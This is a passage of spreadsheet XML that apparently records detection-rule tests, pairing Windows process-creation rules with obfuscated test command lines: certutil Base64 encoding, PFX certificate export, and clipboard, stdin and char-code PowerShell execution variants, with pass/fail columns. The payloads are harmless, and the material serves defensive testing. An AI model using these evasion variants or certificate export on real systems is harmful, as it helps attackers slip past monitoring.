      <c r="D682" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E682" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"encode" C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I682" s="36" t="n"/>
      <c r="J682" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K682" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="43" t="n"/>
      <c r="B683" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C683" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D683" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E683" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -enCODe C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H683" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I683" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J683" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K683" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="43" t="n"/>
      <c r="B684" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C684" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D684" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E684" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -eNcOde C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F684" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G684" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H684" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I684" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J684" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K684" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="43" t="n"/>
      <c r="B685" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C685" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D685" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E685" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -EnCoDe C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F685" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G685" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H685" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I685" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J685" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K685" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="43" t="n"/>
      <c r="B686" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_export_pfx</t>
        </is>
      </c>
      <c r="C686" s="36" t="inlineStr">
        <is>
          <t>Certificate Exported Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D686" s="36" t="inlineStr">
        <is>
          <t>3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5</t>
        </is>
      </c>
      <c r="E686" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-exportPFX" LocalMachine C:\temp\cert.pfx</t>
        </is>
      </c>
      <c r="F686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H686" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I686" s="43" t="n"/>
      <c r="J686" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K686" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="43" t="n"/>
      <c r="B687" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C687" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D687" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E687" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I687" s="43" t="n"/>
      <c r="J687" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K687" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="43" t="n"/>
      <c r="B688" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C688" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D688" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E688" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I688" s="43" t="n"/>
      <c r="J688" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K688" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="43" t="n"/>
      <c r="B689" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C689" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D689" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E689" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \"iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I689" s="43" t="n"/>
      <c r="J689" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K689" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="43" t="n"/>
      <c r="B690" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C690" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D690" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E690" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I690" s="43" t="n"/>
      <c r="J690" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K690" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="43" t="n"/>
      <c r="B691" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C691" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D691" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E691" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I691" s="43" t="n"/>
      <c r="J691" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K691" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="43" t="n"/>
      <c r="B692" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C692" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D692" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E692" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I692" s="36" t="n"/>
      <c r="J692" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K692" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="43" t="n"/>
      <c r="B693" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C693" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D693" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E693" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I693" s="43" t="n"/>
      <c r="J693" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K693" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="43" t="n"/>
      <c r="B694" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C694" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D694" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E694" s="36" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \"$c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H694" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J694" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K694" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="43" t="n"/>
      <c r="B695" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C695" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D695" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E695" s="36" t="inlineStr">
        <is>
          <t>cmd -"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F695" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G695" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H695" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J695" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K695" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="43" t="n"/>
      <c r="B696" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C696" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D696" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E696" s="36" t="inlineStr">
        <is>
          <t>cmd /"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F696" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G696" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H696" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I696" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J696" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K696" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="43" t="n"/>
      <c r="B697" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C697" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D697" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E697" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H697" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I697" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J697" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K697" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="43" t="n"/>
      <c r="B698" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C698" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D698" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E698" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFilE -COmManD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F698" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G698" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H698" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I698" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J698" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K698" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="43" t="n"/>
      <c r="B699" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C699" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D699" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E699" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRofilE -CoMmaNd "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H699" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I699" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J699" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K699" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="43" t="n"/>
      <c r="B700" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C700" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D700" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E700" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfile -CoMMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H700" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I700" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J700" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K700" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="43" t="n"/>
      <c r="B701" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C701" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D701" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E701" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F701" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G701" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H701" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I701" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J701" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K701" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="43" t="n"/>
      <c r="B702" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C702" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D702" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E702" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -COMmanD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H702" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I702" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J702" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K702" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="43" t="n"/>
      <c r="B703" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C703" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D703" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E703" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H703" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I703" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J703" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K703" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="43" t="n"/>
      <c r="B704" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C704" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D704" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E704" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H704" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I704" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J704" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K704" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="43" t="n"/>
      <c r="B705" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C705" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D705" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E705" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H705" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I705" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J705" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K705" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="43" t="n"/>
      <c r="B706" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C706" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D706" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E706" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I706" s="43" t="n"/>
      <c r="J706" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K706" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="43" t="n"/>
      <c r="B707" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C707" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D707" s="36" t="inlineStr">
        <is>
